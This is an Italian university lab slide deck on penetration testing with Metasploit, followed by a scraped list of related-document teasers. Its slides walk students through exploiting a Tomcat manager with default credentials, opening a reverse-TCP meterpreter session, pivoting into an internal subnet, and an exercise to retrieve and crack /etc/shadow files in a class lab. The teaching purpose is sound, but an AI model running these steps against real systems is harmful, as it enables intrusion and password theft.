Penetration Testing. Metasploit
|
|
- Niccolina Murgia
- 7 anni fa
- Visualizzazioni
Transcript
1 Penetration Testing Metasploit Dipartimento di Informatica Via salaria Novembre 2011 Dott. Antonio Villani Dott. Nino Verde 1
2 Riferimenti Metasploit Unleashed - pdf scaricabile da: ploit%20unleashed.pdf 2
3 Metasploit Framework Il framework non e' un tool finalizzato alla realizzazione di attacchi per hacker ma un'interfaccia generale per testare e scrivere exploits. Un exploit è un codice che, sfruttando un bug o una vulnerabilità, porta all'acquisizione di privilegi o all'accesso del sistema cui viene applicato. 3
4 Metasploit Framework Piattaforma Open Source avanzata usata per sviluppare, testare e usare exploit code Disponibile per ogni sistema operativo Inizialmente sviluppato in Perl ora sviluppato in Ruby Architettura modulare, scriptabile... Moduli aggiuntivi Non richiede conoscenza di bug o scrittura di shellcode 4
5 Metasploit Framework Overview Metasploit permette di Ricercare nuove tecniche d'attacco Analizzare i metodi degli attaccanti Test di IDS/IPS Penetration Test 5
6 Exploits Piattaforme attaccabili: linux / macosx / solaris / windows / etc Exploits mirati alle applicazioni (Browsers, backup, ftp, etc ) Exploits remoti, ma privilege escalation possibile con meterpreter. Exploits organizzati attraverso path: /piattaforma/applicaozione/exploit (es: /windows/browser/ms06_001_wmf_setabortproc) 6
7 Metaexploits: evasione controlli IDS Codifica: spesso cambiare il payload di un exploit ne fa cambiare la signature NOP no operation Es: plugin ips_filter 7
8 Payload Il payload è il codice o il comando che vogliamo venga eseguito sull'host target Il Payload è spesso definito come shellcode. La definizione è imprecisa dato che un attacco non esegue necessariamente una shell, es: creazione nuovo utente, nuovo processo di controllo, rootkit, apertura socket di rete... 8
9 Interfacce Metasploit Framework Msfconsole: Console Interattiva Msfcli: linea di comando Msfpayload: permette di creare payload eseguibile Msfweb: Because everything has to have a web interface msfwx GUI: Graphical User Interfaces Msfapi: (in sviluppo) piattaforma di sviluppo modulare 9
10 Vediamolo in azione 10
11 Configurazione di Rete 11
12 Per iniziare... Userete putty (dalla vostra macchina windows) per connettervi via ssh alle macchina Kali User: root PSW: toor Cerchiamo di capire quanti host attivi ci sono sulla rete: $nmap /24 -n Per prima cosa faremo insieme una scansione delle porte aperte sulla prima macchina target $nmap n $sudo nmap -ss n SYN scan 12
13 Scansione delle vulnerabilità Dal risultato di nmap si capisce che ci sono moltissime porte aperte su questo host. Alcune anche anche sospette (IRC,telnet,etc.) Diamo un'occhiata con Nessus o OpenVas a possibili vulnerabilità Tra le tante vulnerabilità sembra che Tomcat abbia password di default, e metasploit ha un exploit per tale vulnerabilità che ci darà accesso da amministratore alla macchina Cercate gli exploit per tomcat e controllate le informazioni fornite dal framework metasploit (usate info o show options) Quale fa al caso nostro? 13
14 Usiamo ora Metasploit $msfconsole avvierà la console di metasploit Comandi utili: search VAR per eseguire una ricerca tra i moduli di metasploit use VAR per usare un particolare modulo. I moduli sono organizzati in una gerarchia ben definita info mostra delle informazioni sul modulo in uso show options mostra le opzioni da settare set VAR per impostare il valore di una variabile set payload VAR per impostare il payload Exploit lanciare l'exploit 14
15 Payload Ci sono tanti possibili payload. Ogni exploit ne supporta alcuni. Il payload va settato dopo aver scelto l'exploit da utilizzare. Meterpreter è uno dei payload più utili: È sostanzialmente una shell avanzata Diverse modalità di connessione: Bind tcp Reverse tcp Reverse http, etc.. 15
16 Exploit Tomcat on the first machine msf> use exploit/multi/http/tomcat_mgr_deploy SETTATE LE VARIE OPZIONI COME MOSTRATO DI SOTTO msf exploit(tomcat_mgr_deploy) > show options Module options (exploit/multi/http/tomcat_mgr_deploy): Name Current Setting Required Description PASSWORD tomcat no The password for the specified username PATH /manager yes The URI path of the manager app (/deploy and /undeploy will be used) Proxies no Use a proxy chain RHOST yes The target address RPORT 8180 yes The target port USERNAME tomcat no The username to authenticate as VHOST no HTTP server virtual host Payload options (java/meterpreter/reverse_tcp): Name Current Setting Required Description LHOST yes The listen address LPORT 4444 yes The listen port Exploit target: Id Name Automatic LANCIATE L'EXPLOIT msf exploit(tomcat_mgr_deploy) > exploit
17 Getting the meterpreter session msf exploit(tomcat_mgr_deploy) > exploit [*] Started reverse handler on :4444 [*] Attempting to automatically select a target... [*] Automatically selected target "Linux x86" [*] Uploading 6471 bytes as UA99glu9ybDXRwb7YtZ4.war... [*] Executing /UA99glu9ybDXRwb7YtZ4/Zvuq4YcK2m.jsp... [*] Undeploying UA99glu9ybDXRwb7YtZ4... [*] Sending stage (30355 bytes) to [*] Meterpreter session 6 opened ( :4444 -> :47873) at :57: meterpreter >
18 Check configuration rpreter > ifconfig Interface 1 ============ Name : lo - lo Hardware MAC : 00:00:00:00:00:00 IPv4 Address : IPv4 Netmask : IPv6 Address : ::1 IPv6 Netmask : :: Interface 2 ============ Name : eth1 - eth1 Hardware MAC : 00:00:00:00:00:00 IPv4 Address : IPv4 Netmask : IPv6 Address : fe80::20c:29ff:fe9b:e8d0 IPv6 Netmask : :: Interface 3 ============ Name : eth0 - eth0 Hardware MAC : 00:00:00:00:00:00 IPv4 Address : IPv4 Netmask : IPv6 Address : fe80::20c:29ff:fe9b:e8c6 IPv6 Netmask : :: Meterpreter > Background session 6? [y/n] msf exploit(tomcat_mgr_deploy) >
19 Considerazioni Sembra che l'host ha effettivamente un altra scheda di rete configurata con indirizzo IP appartenente ad un'altra sottorete Vogliamo allora fare una scansione in quella sottorete Faremo pivoting attraverso la macchina già compromessa. Per prima cosa dobbiamo aggiungere una rotta...
20 Configurazione di Rete postexploitation
21 Alcuni comandi utili Prima di aggiungere una rotta impariamo ad usare le sessioni meterpreter Per mandare in background una sessione meterpreter usare il comando background Da msfconsole, il comando sessions vi resituisce una lista delle sessioni in background attive Vedere sessions -h per help Per ritornare ad una sessione in background usare: sessione -i NUMEROSESSIONE
22 Il comando route Il comando route permette di aggiungere delle rotte alla tabella di routing usata da metasploit. Con questo comando possiamo raggiungere sottoreti visibili soltanto da altri host che abbiamo precedentemente attaccato Usage: route [add/remove/get/flush/print] subnet netmask [comm/sid] Route traffic destined to a given subnet through a supplied session. The default comm is Local.
23 Aggiungere una rotta verso la rete interna Una volta che la sessione meterpreter è in background possiamo aggiungere la nuova rotta. msf exploit(tomcat_mgr_deploy) > route add [*] Route added msf exploit(tomcat_mgr_deploy) > route print Active Routing Table ==================== Subnet Netmask Gateway Session 6
24 Scansione della rete interna (1/2) msf exploit(tomcat_mgr_deploy) > use auxiliary/scanner/portscan/tcp msf auxiliary(tcp) > show options Module options (auxiliary/scanner/portscan/tcp): Name Current Setting Required Description CONCURRENCY 10 yes The number of concurrent ports to check per host PORTS yes Ports to scan (e.g ,80, ) RHOSTS yes The target address range or CIDR identifier THREADS 1 yes The number of concurrent threads TIMEOUT 1000 yes The socket connect timeout in milliseconds
25 Scansione della rete interna (2/2) msf auxiliary(tcp) > run [*] :25 - TCP OPEN [*] :21 - TCP OPEN [*] :22 - TCP OPEN [*] :23 - TCP OPEN [*] :53 - TCP OPEN [*] :80 - TCP OPEN [*] :111 - TCP OPEN [*] :139 - TCP OPEN [*] :445 - TCP OPEN [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed msf auxiliary(tcp) >
26 Configurare un proxy per raggiungere la rete interna da altre applicazioni Ora che abbiamo una rotta verso il target configuriamo un proxy che può essere usato da altre applicazioni diverse da meterpreter Metasploit ha un modulo che ci permette di fare ciò: auxiliary/server/socks4a Questo modulo permette di creare un proxy che utilizza la funzionalità di routing interna a Metasploit per redirigere le connessioni.
27 auxiliary/server/socks4a msf auxiliary(tcp) > use auxiliary/server/socks4a msf auxiliary(socks4a) > show options Module options (auxiliary/server/socks4a): Name Current Setting Required Description SRVHOST yes The address to listen on SRVPORT 1080 yes The port to listen on. msf auxiliary(socks4a) > run [*] Auxiliary module execution completed [*] Starting the socks4a proxy server msf auxiliary(socks4a) >
28 Proxychains Ora avremo un proxy in ascolto su localhost:1080 Dobbiamo configurare il tool che redirigerà verso tale proxy tutto il traffico: proxychains Modifichiamo /etc/proxychains.conf editando l'ultima riga, che diventerà: Socks proxychains nmap -st -n -PN L'opzione -PN evita l'utilizzo di pacchetti UDP non supportati da proxychain
29 Proviamo ad usare altri servizi proxychains ssh ProxyChains-3.1 ( S-chain -<> :1080-<><> :22-<><>-OK password:
30 Esercizio Continuare l'exploitation della seconda macchina Fare attenzione al payload di meterpreter utilizzato Spiegare perché java/meterpreter/reverse_tcp non può essere utilizzato Ci sono altri possibili target?
31 Esercizio PenTest Mandate una mail a verde@di.uniroma1.it per ricevere le istruzioni ed i file necessari alla configurazione di una rete VPN Una volta stabilita la connessione con la VPN otterrete un indirizzo nella sottorete /24 Il vostro primo target è la macchina Una volta compromesso quel target dovrete continuare il lavoro di post-exploitation e trovare altri host vulnerabili Obiettivo: recuperare il file /etc/passwd e /etc/shadow di tutte le macchine compromesse e provare a crackare le password
32 Regole Non barate... ci possiamo accorgere di come siete arrivati alla soluzione Non modificate le impostazioni di rete delle macchine compromesse (interfacce, indirizzi ip, etc.) Appena compromessa una qualsiasi macchina mandate una mail a verde@di.uniroma1.it Avrete tempo fino al 20 dicembre per terminare l'esercizio Entro quella data dovrete redigere un report delle attività svolte e delle vulnerabilità trovate ed exploitate Inserite quanti più dettagli possibili nel report
Hacker Frameworks & Risorse utili HACKER FRAMEWORKS
Hacker Frameworks & Risorse utili HACKER FRAMEWORKS In questo modulo vedremo sia i software framework più utilizzati in ambito di penetration testing sia le risorse, come ad esempio siti internet dedicati,
DettagliRootkit. Dott. Ing. Igino Corona. Corso Sicurezza Informatica 2014/2015. igino.corona (at) diee.unica.it. Pattern Recognition and Applications Lab
Pattern Recognition and Applications Lab Rootkit Dott. Ing. Igino Corona igino.corona (at) diee.unica.it Corso Sicurezza Informatica 2014/2015 Department of Electrical and Electronic Engineering University
Dettagli1 GARR Tutorial sulla sicurezza informatica. R. Cecchini e O. Pinazza Roma, 16 17 18/11/2010
1 GARR Tutorial sulla sicurezza informatica R. Cecchini e O. Pinazza Roma, 16 17 18/11/2010 Programma della giornata 17 18 19 novembre 2010 1 a parte: vulnerabilità e backdoor in MS Windows Pausa pranzo
DettagliSetup dell ambiente virtuale
Setup dell ambiente virtuale 1.1 L immagine per le macchine virtuali Il file sicureti.iso è l immagine ISO di una distribuzione live di Linux (basata Debian Stretch, ottenuta con live-build, http://live.debian.net).
DettagliIntroduzione a Linux Lezione 8 Gestione della rete
Introduzione a Linux Lezione 8 Gestione della rete Angelo Genovese Corso di Sistemi Operativi I/II Prof. V. Piuri Università degli Studi di Milano Dipartimento di Informatica A.A. 2018/2019 2018 2015 Angelo
DettagliSommario. Oggetto: Istruzioni configurazione client VPN SSL per piattaforma Mac OSX Data: 25/01/2016 Versione: 1.0
Oggetto: Istruzioni configurazione client VPN SSL per piattaforma Mac OSX Data: 25/01/2016 Versione: 1.0 Sommario 1. PREMESSA... 2 2. INSTALLAZIONE SOFTWARE VPN CLIENT... 2 3. PRIMO AVVIO E CONFIGURAZIONE
DettagliATTACCO DI UN SERVER LINUX
ATTACCO DI UN SERVER LINUX RECUPERO INFORMAZIONI NOTA: Le attività spiegate da qui in avanti vanno fatte solamente su macchine di cui siete proprietari. Tentativi di intrusione in sistemi informatici potrebbero
DettagliULISSE LAB. CTF: How to improve your pentesting skills with HackTheBox
ULISSE LAB CTF: How to improve your pentesting skills with HackTheBox Capture The Flag L obiettivo principale è quello di trovare un file specifico all interno di una macchina vulnerabile. Questo può essere
DettagliInstallazione e Configurazione del servizio DHCP. Orazio Battaglia
Installazione e Configurazione del servizio Orazio Battaglia Protocollo e Servizio Il protocollo (Dynamic Host Configuration Protocol) è un protocollo di rete di livello applicativo che permette ai dispositivi
DettagliSe per esempio inserisco show version ecco il risultato. Con il comando enable entro in privilege mode.
Laboratorio 1 Packet Tracer Prendiamo un router ed un computer. Prendiamo un console cable e lo colleghiamo alla console port del router e alla porta RS 232 del PC. Clicchiamo sul PC e scegliamo il Terminal.
DettagliGuida introduttiva su Eclipse. Ing. Marco Dell'Unto marco.dellunto@iet.unipi.it
Guida introduttiva su Eclipse Ing. Marco Dell'Unto marco.dellunto@iet.unipi.it Introduzione Eclipse è un ambiente di sviluppo (IDE) multilinguaggio e multipiattaforma scritto in Java. E Open Source. Può
DettagliNetwork Address Translation
Network Address Translation 1 Concetti di NAT e assegnazione IP pubblici L indirizzamento IP finora utilizzato è quello associato al protocollo IPv4. Ciascun indirizzo IPv4 è composto da 32 bit, quindi
DettagliBucare WindowsXP SP2 con Metasploit
Bucare WindowsXP SP2 con Metasploit Vulnerabilità ms08_067_netapi Dall'introduzione del Service Pack 2, in data Agosto 2006, Windows XP era ritenuto molto più sicuro, vista l'introduzione di numerosi bugfix
DettagliAggiornamenti e Client Side Exploitation
ICT Security Magazine ICT Security - La Prima Rivista Dedicata alla Sicurezza Informatica https://www.ictsecuritymagazine.com Aggiornamenti e Client Side Exploitation Author : Milo Caranti Date : 5 settembre
DettagliSommario. Configurazione dell'interfaccia di rete comando ifconfig individuazione interfacce. impostazioni: comandi ifup e ifdown
Seconda Esercitazione Sommario Configurazione dell'interfaccia di rete comando ifconfig individuazione interfacce attivazione (up) disattivazione (down) impostazioni: indirizzo IP maschera di rete (netmask)
Dettagli02/10/2015 SISTEMI E RETI. Router Cisco. Parte 2 - IOS. A cura dell Ing. Claudio Traini. router. sottoreti. terminali
SISTEMI E RETI Router Cisco Parte 2 - IOS A cura dell Ing. Claudio Traini sottoreti router terminali 1 Livelli di accesso ai comandi Un router ha due livelli di accesso ai comandi User EXEC mode Privileged
DettagliHACKING LAB. con ProxMox e Metasploitable. Andrea Draghetti - 23 Maggio FabLab Bassa Romagna
HACKING LAB con ProxMox e Metasploitable $ whoami Phishing Analysis and Contrast @ D3Lab Team Member @ BackBox Linux Hacking Lab Un laboratorio nella propria infrastruttura di rete per allenarsi in assoluta
DettagliLaboratorio di. Reti Informatiche. Corso di Laurea Triennale in Ingegneria Informatica A.A. 2016/2017. Ing. Niccolò Iardella
Laboratorio di Reti Informatiche Corso di Laurea Triennale in Ingegneria Informatica A.A. 2016/2017 Ing. Niccolò Iardella niccolo.iardella@unifi.it 1 Esercitazione 7 Configurazione del firewall 2 Programma
DettagliL Inoltro e l Instradamento
Politecnico di Milano Advanced Network Technologies Laboratory L Inoltro e l Instradamento - Inoltro diretto e indiretto negli host - Inoltro diretto e indiretto nei router - Tabelle di routing - Esempi
DettagliProtocollo ARP IP forwarding
Protocollo ARP IP forwarding A.A. 2018/2019 Walter Cerroni Reti IP come insiemi di indirizzi Una rete IP è individuata dall indirizzo di rete, che è quello con i bit dell Host-ID tutti a zero (in genere
DettagliSistema operativo. Avere un architettura multi-core è un vantaggio
Sistema operativo Software responsabile del controllo e della gestione dei componenti hardware di un computer mediante interfaccia (driver), e della gestione dei vari programmi del computer. I programmi
DettagliPer connettere la MWDG-ETH a internet o per utilizzarla attraverso la rete LAN eseguire le seguenti operazioni:
Connessione LAN Per connettere la MWDG-ETH a internet o per utilizzarla attraverso la rete LAN eseguire le seguenti operazioni: 1) Alimentare la basestation MWDG-ETH 2) Connettere cavo ethernet tra basestation
DettagliLaboratorio di. Reti Informatiche. Corso di Laurea Triennale in Ingegneria Informatica A.A. 2016/2017. Ing. Niccolò Iardella
Laboratorio di Reti Informatiche Corso di Laurea Triennale in Ingegneria Informatica A.A. 2016/2017 Ing. Niccolò Iardella niccolo.iardella@unifi.it 1 Esercitazione 2 Configurazione di interfacce di rete,
DettagliLaboratorio di. Reti Informatiche. Corso di Laurea Triennale in Ingegneria Informatica A.A. 2017/2018. Ing. Carlo Vallati
Laboratorio di Reti Informatiche Corso di Laurea Triennale in Ingegneria Informatica A.A. 2017/2018 Ing. Carlo Vallati carlo.vallati@unipi.it 1 Esercitazione 2 Configurazione di interfacce di rete, gateway
DettagliAntonio Cianfrani. L emulatore Packet Tracer A.A. 2015/2016
Antonio Cianfrani L emulatore Packet Tracer A.A. 2015/2016 Packet Tracer (1/2) Che cosa è Packet Tracer? Cisco Packet Tracer è un software didattico per l emulazione di apparati di rete CISCO A cosa serve
DettagliLe slides sono all indirizzo: slides.poul.org/2018/corsi-linux-avanzati/ansible
Ansible or: How I learned to stop worrying and love the configuration manager 1 Slides? Le slides sono all indirizzo: slides.poul.org/2018/corsi-linux-avanzati/ansible 2 Ansible: What is that? 3. 1 Ansible
DettagliAI 464 ETH NEW Gestione della scheda Eureka IP Interface (AI4164ETH NEW) Ottobre 2018
AI 464 ETH NEW Gestione della scheda Eureka IP Interfacee (AI4164ETH NEW) Ottobre 2018 INDICE INTRODUZIONE ACCESSO ALLA INTERFACCIA AI4164ETH NEW VIA WEB CONFIGURARE LE IMPOSTAZIONI GENERALI CONFIGURARE
DettagliModuli Bluetooth 03 - connessione seriale via BT
Moduli Bluetooth 03 - connessione seriale via BT v 0.1 - Author: Mirco Piccin aka pitusso La connessione seriale ai moduli BT permette di inviare dati dal pc/smartphone/altro ad Arduino, in modalita wireless.
DettagliReti di Comunicazione e Internet
Politecnico di Milano Dipartimento di Elettronica e Informazione Reti di Comunicazione e Internet Laboratorio 2. Packet Tracer Agenda della lezione CISCO IOS Command Line Interface: User Exec Mode Privileged
DettagliNAT: Network Address Translation
NAT: Network Address Translation Prima di tutto bisogna definire che cosa si sta cercando di realizzare con NAT 1. Stai cercando di consentire agli utenti interni di accedere a Internet? 2. Stai cercando
DettagliRelazione su METASPLOIT FRAMEWORK
Università degli Studi di Catania Corso di Laurea Specialistica in Ingegneria Informatica Sicurezza nei Sistemi Informativi Docente prof. O. Tomarchio Relazione su METASPLOIT FRAMEWORK Studenti Coco Ignazio
DettagliChi sono. Metasploit Framework - Net&System Security - Pisa, 27 Novembre 2007 - Matteo Falsetti
Chi sono ricercatore indipendente da dieci anni da sei mi occupo di penetration testing e vulnerability assessment non faccio parte del team di sviluppo di Metasploit Metasploit Framework - Net&System
DettagliL'ambiente DB2 in LAB (e come collegarsi da remoto)
L'ambiente DB2 in LAB (e come collegarsi da remoto) Sistemi Informativi T Versione elettronica: L00.DB2inLAB.pdf Il server IBM DB2 Il server DB2, edizione Express-C, è installato su una macchina Linux
DettagliSeconda Prova in itinere Esempio
Fondamenti di Internet e Reti Proff. A. Capone, M. Cesana, I. Filippini, G. Maier Cognome Nome Matricola Seconda Prova in itinere Esempio Tempo complessivo a disposizione per lo svolgimento: 1h45m Usare
DettagliDOMANDA 1: Qual è il più piccolo blocco di indirizzi che servirebbe a questa rete? Rete1P R4 H
Esercizio Subnetting, Routing e configurazione macchine Linux Considerando la topologia di rete rappresentata in figura, ed avendo a disposizione lo spazio di indirizzi 79.0.192.0/18, ricavare utilizzando
DettagliProteggere la rete I FIREWALL (seconda parte)
Proteggere la rete I FIREWALL (seconda parte) Index Architetture di rete con Firewall A cosa serve il NAT Cosa sono gli Intrusion Detection System Esistono molte architetture possibili per inserire un
DettagliLABORATORIO DI SISTEMI OPERATIVI
LABORATORIO DI SISTEMI OPERATIVI Corso di Laurea Triennale in Ingegneria Informatica A.A. 2018/2019 Guglielmo Cola Email: g.cola@iet.unipi.it Web: iet.unipi.it/g.cola Esercitazione 3 Gestione utenti (seconda
DettagliEsercitazione di Reti di Calcolatori Installazione Del Software https://www.netacad.com/courses/packet-tracer Sign in > Resources > Download Packet Tracer Packet Tracer Interface Ecco l interfaccia principale
DettagliEsercitazione su routing IP con OSPF
Reti di Calcolatori I Esercitazione su routing IP con OSPF Prof. Roberto Canonico Dipartimento di Ingegneria Elettrica e delle Tecnologie dell Informazione Corso di Laurea in Ingegneria delle Telecomunicazioni
DettagliAnalisi del Traffico di Rete
Analisi del Traffico di Rete L. Massari, G. Nebbione giuseppe.nebbione01@universitadipavia.it University of Pavia Anno Accademico 2018/2019 1 / 30 Outline 1 Introduzione all analisi dei pacchetti 2 Pillole
DettagliReti e Sicurezza Informatica Esercitazione 5
Corso di Laurea in Informatica Reti e Sicurezza Informatica Esercitazione 5 Prof. Mario Cannataro Ing. Giuseppe Pirrò Le fasi di un attacco informatico Footprinting Scansione Enumerazione Exploit Controllo
DettagliArea FA-Teleassistenza Specifica tecnica STM33 Cliente: Mitsubishi
Area FA-Teleassistenza Specifica tecnica STM33 Cliente: Mitsubishi Teleassistenza Serie FX Serie Q ewon Mod. FA_STM_00 Data: 07.03.2013 Pag. 1/31 STM33.doc Rev. 01 Preparato da: Verificato da: Firme Massimiliano
DettagliINFOCOM Dept. Il routing
Il routing Funzione di instradamento nei Router IP I Router IP hanno la funzione di instradare i datagrammi in rete: ricevono un datagramma da una interfaccia, eseguono alcune operazioni e rilanciano il
DettagliInternet Protocol Versione 4: instradamento e routing. Aspetti di forwarding e routing del protocollo IPv4
Internet Protocol Versione 4: instradamento e routing Aspetti di forwarding e routing del protocollo IPv4 1 Instradamento (forwarding) Operazione comune a tutte le macchine con stack TCP/IP Router, end
DettagliScritta da Andrea Cappa COME INSTALLARE LINUX IN UN HOST VIRTUALE
Scritta da Andrea Cappa COME INSTALLARE LINUX IN UN HOST VIRTUALE Di cosa abbiamo bisogno? 1 Virtual-Box 2 Una ISO di Linux 3 Una connessione ad internet Iniziamo Per prima cosa avviamo Virtual-Box, dopo
DettagliAntonio Cianfrani. Standard Access Control List (ACL)
Antonio Cianfrani Standard Access Control List (ACL) Indice Cosa sono le ACL? Interfacce Inbound & Outbound Wildcard mask Configurare una ACL standard ACL extended (prossima lezione) Named ACL (prossima
DettagliIntroduzione ad hping
Università degli Studi di Milano Facoltà di Scienze Matematiche, Fisiche e Naturali Anno Accademico 2007/2008 Introduzione ad hping Roberto Paleari 2-4 Settembre 2008 Roberto Paleari Introduzione ad hping
DettagliRiassunto della rete virtuale
Riassunto della rete virtuale 1.1 La rete di Qemu Figura 1.1: La rete virtuale creata da Qemu in modalità user networking Qemu implementa una rete virtuale minimale con la topologia descritta nella figura
DettagliEsercitazione di Reti di Calcolatori Installazione Del Software https://www.netacad.com/courses/packet-tracer Sign in > Resources > Download Packet Tracer Packet Tracer Interface Ecco l interfaccia principale
DettagliRouting IP A.A. 2006/2007. Walter Cerroni. Routing gerarchico in Internet
Routing IP A.A. 2006/2007 Walter Cerroni Routing gerarchico in Internet Dal punto di vista del routing, Internet è suddivisa in modo gerarchico in Autonomous System (AS) un AS è un gruppo connesso di una
Dettagli4.2 Collegamento con Mozilla Firefox o Google Chrome 5 Tool di configurazione rapida (Config Tool) Presentazione 5.2 Ricerca / Connessione
IT EN. 1 Presentazione generale... 4 1.1 Accessori 1.2 Specifiche 1.3 Configurazione predefinita della rete 2 Struttura... 7 2.1 Dimensioni 2.2 Sistema 3 Installazione... 9 3.1 Installazione dell'apparecchio
DettagliSeconda Prova in itinere Esempio
Fondamenti di Internet e Reti Proff. A. Capone, M. Cesana, I. Filippini, G. Maier Cognome Nome Matricola Seconda Prova in itinere Esempio Tempo complessivo a disposizione per lo svolgimento: 1h45m Usare
DettagliIngegneria del Software 1: Eclipse
Ingegneria del Software 1: Eclipse Da completare entro Marzo 15, 2016 S. Krstić and M. Scavuzzo and F. Marconi and A. Rizzi and C. Menghi 1 Contents 1 Introduzione 3 1.1 Java (JRE vs JDK)..........................................
DettagliGuida Tecnica. Configurazione del Router ZyXEL P-660H-D1 per la visione da remoto di alcuni DVR Brahms, anche con IP dinamico.
Guida Tecnica Configurazione del Router ZyXEL P-660H-D1 per la visione da remoto di alcuni DVR Brahms, anche con IP dinamico. Se abbiamo la necessità di visionare da remoto un DVR, è opportuno configurare
DettagliActive Discovery TOOLS: CHI PIÙ NE HA PIÙ NE METTA
Active Discovery TOOLS: CHI PIÙ NE HA PIÙ NE METTA TOOLS Nmap è sicuramente un punto di riferimento per la fase dell Active Discovery, grazie al quale possiamo fare dell information gathering e dell enumeration
DettagliAntonio Cianfrani. Dynamic Host Configuration Protocol (DHCP)
Antonio Cianfrani Dynamic Host Configuration Protocol (DHCP) Il protocollo DHCP Il protocollo DHCP consente ad un router di configurare dinamicamente gli host all interno di una LAN. Parametri da configurare:
DettagliCloud Hik-Connect. Guida rapida per registrare un dispositivo su Hik-Connect
Cloud Hik-Connect Guida rapida per registrare un dispositivo su Hik-Connect Indice 1. Come registrare account Hik-Connect... 3 a. Registrazione tramite APP Hik-Connect... 3 b. Registrazione tramite web
DettagliCosa è importante: pom.xml Goal Plug-in Repository
Cos è Maven? Maven è un software usato principalmente per la gestione di progetti Java e build automation, ma è utile anche per gestire documentazione, report, dipendenze... Cosa è importante: pom.xml
DettagliCorso sul linguaggio SQL
Corso sul linguaggio SQL Modulo L2B (SQL) 1 - Introduzione 1 Prerequisiti Aver installato mysql o EasyPHP Database e tabelle Struttura di una tabella 2 1 Introduzione In questa Unità descriviamo i primi
DettagliPenetration Testing Aziendale con BeEF
Penetration Testing Aziendale con BeEF Giovanni Cattani Giovanni Cattani Security Specialist @ Secure Network S.r.l. #penetrationtest #vulnerabilityassessment #web #mobile #network #riskassessment BeEF
DettagliAntonio Cianfrani. Configurazione di un Router CISCO A.A. 2015/2016
Antonio Cianfrani Configurazione di un Router CISCO A.A. 2015/2016 IOS Un router o uno switch non possono funzionare senza sistema operativo Studieremo il sistema operativo della Cisco: Cisco IOS L IOS
DettagliBOLLETTINO DI SICUREZZA INFORMATICA
STATO MAGGIORE DELLA DIFESA II Reparto Informazioni e Sicurezza Ufficio Sicurezza Difesa Sezione Gestione del Rischio CERT Difesa CC BOLLETTINO DI SICUREZZA INFORMATICA N. 5/2008 Il bollettino può essere
DettagliSeconda Esercitazione
Seconda Esercitazione Sommario Configurazione dell'interfaccia di rete comando ifconfig individuazione interfacce attivazione (up) disattivazione (down) impostazioni: indirizzo IP maschera di rete (netmask)
DettagliConnessione con MySQL
Connessione con MySQL Architettura Server-Side Eventuali parametri cookie sessioni Elaborazione SELECT... DATABASE Quando i dati sono molti e la persistenza deve andare altre la sessione o la durata
DettagliConfigurazione firewall Cisco ASA5505
Configurazione firewall Cisco ASA5505 Argomenti da trattare: Creazione della rete Assegnazione indirizzi Modifica delle impostazioni di default delle vlan esistenti Assegnazione della vlan ad una interfaccia
DettagliDifesa perimetrale di una rete
Muro tagliafuoco per: Evitare accessi indesiderati Controllare traffico di dati in uscita Tagliare i flussi di I/O generati da malware Filtrare i segmenti di una VLAN azione Tipi di firewall: Ingress firewall
Dettaglimbnetfix NHF100 La seguente guida ha come scopo di fornire le indicazioni per una configurazione di base, per
mbnetfix NHF100 Guida base alla configurazione La seguente guida ha come scopo di fornire le indicazioni per una configurazione di base, per funzioni avanzate è possibile consultare il manuale completo
DettagliSoftware per l individuazione dei malfunzionamenti di rete
Software per l individuazione dei malfunzionamenti di rete ForTIC Percorso Formativo C2 Modulo 4 Fabio Calefato - ForTIC / C2 / Modulo 4 1 Strumenti utili ipconfig / ifconfig ping tracert / traceroute
DettagliIP forwarding Firewall e NAT
IP forwarding Firewall e NAT A.A. 2004/2005 Walter Cerroni IP forwarding Linux può funzionare da gateway tra due o più reti IP host1 host2 linux-gw 192.168.10.0/24 192.168.11.0/24 Il kernel deve essere
DettagliSommario ... vi Sommario
Sommario.... Introduzione xiii Capitolo 1 1 test per la certificazione Microsoft 1 Condizioni di svolgimento dei test 2 Impostazione e caratteristiche dei test 3 Uso efficace dei software di test Microsoft
DettagliNumero NaviDimensione Nave
RETI INFORMATICHE - SPECIFICHE DI PROGETTO AA. 2011/2012 1 1.1RETI INFORMATICHE CORSO DI LAUREA IN INGEGNERIA INFORMATICA SPECIFICHE DI PROGETTO A.A. 2011/2012 Il progetto consiste nello sviluppo di un
DettagliMetasploit Framework Version 2.2 Corso Crash per Utenti
Metasploit Framework Version 2.2 Corso Crash per Utenti Introduzione Questo documento vuole essere una sorta di guida per l utente alla versione 2.2 del Metasploit Framework (letteralmente framework vuole
DettagliEthical Hacking Basic CONTENUTI
Ethical Hacking Basic Durata: 5 giorni Modulo 1: Penetration Test CONTENUTI Introduzione: tipologie di Penetration Test Metodologie e standard Aspetti normativi Fasi: 1. Il Footprinting dell'infrastruttura
DettagliLezione 6: Dynamic Host Configuration Protocol
Lezione 6: Dynamic Host Configuration Protocol Università degli Studi di Milano Insegnamento di Terminologia - 1 ISO/OSI (Open System Interconnection) IP ARP Terminologia - 1 ISO/OSI (Open System Interconnection)
DettagliEsercitazione 5 Firewall
Sommario Esercitazione 5 Firewall Laboratorio di Sicurezza 2017/2018 Andrea Nuzzolese Packet Filtering ICMP Descrizione esercitazione Applicazioni da usare: Firewall: netfilter Packet sniffer: wireshark
DettagliSicurezza delle reti. Monga. Configurazioni Effetti di un firewall. Stateless filtering TCP INGRESS e EGRESS SSH. Complessità del filtering SMTP
Sicurezza dei sistemi e delle 1 Mattia Lezione VIII: Pattern ricorrenti Dip. di Informatica Università degli Studi di Milano, Italia mattia.monga@unimi.it a.a. 2013/14 1 cba 2011 14 M.. Creative Commons
DettagliEsercitazione. Prima di chiedere hai usato il comando man? sovente 1 settimana di esperimenti possono risparmiare 1 ora di lettura
Esercitazione Avete creato una cartella nella vostra home di nome (tutto MAIUSCOLO) A4A dove mettere in disparte gli esercizi che fate (non solo quelli di oggi)? Prima di chiedere hai usato il comando
DettagliIl programma di gestione per il mondo della traduzione
SYLLXXX: Il programma di gestione per il mondo della traduzione INSTALLAZIONE Syllxxx- Versione 2.2.0 - Pag 1 Syllxxx- Versione 2.2.0 - Pag 2 Indice 1 Installazione 4 1.1 Syllxxx-PMN e Syllxxx-SMN 4 1.1.1
DettagliRoma2LUG. aka l aula del Pinguino. Laboratorio: Configurazione e Gestione della Rete Locale
Roma2LUG aka l aula del Pinguino in Laboratorio: Configurazione e Gestione della Rete Locale Aprile 2014 Microsoft Corporation, una Software House statunitense, annuncia il termine del supporto per il
DettagliEsame Laboratorio di Sistemi Operativi Cognome Nome Mat.
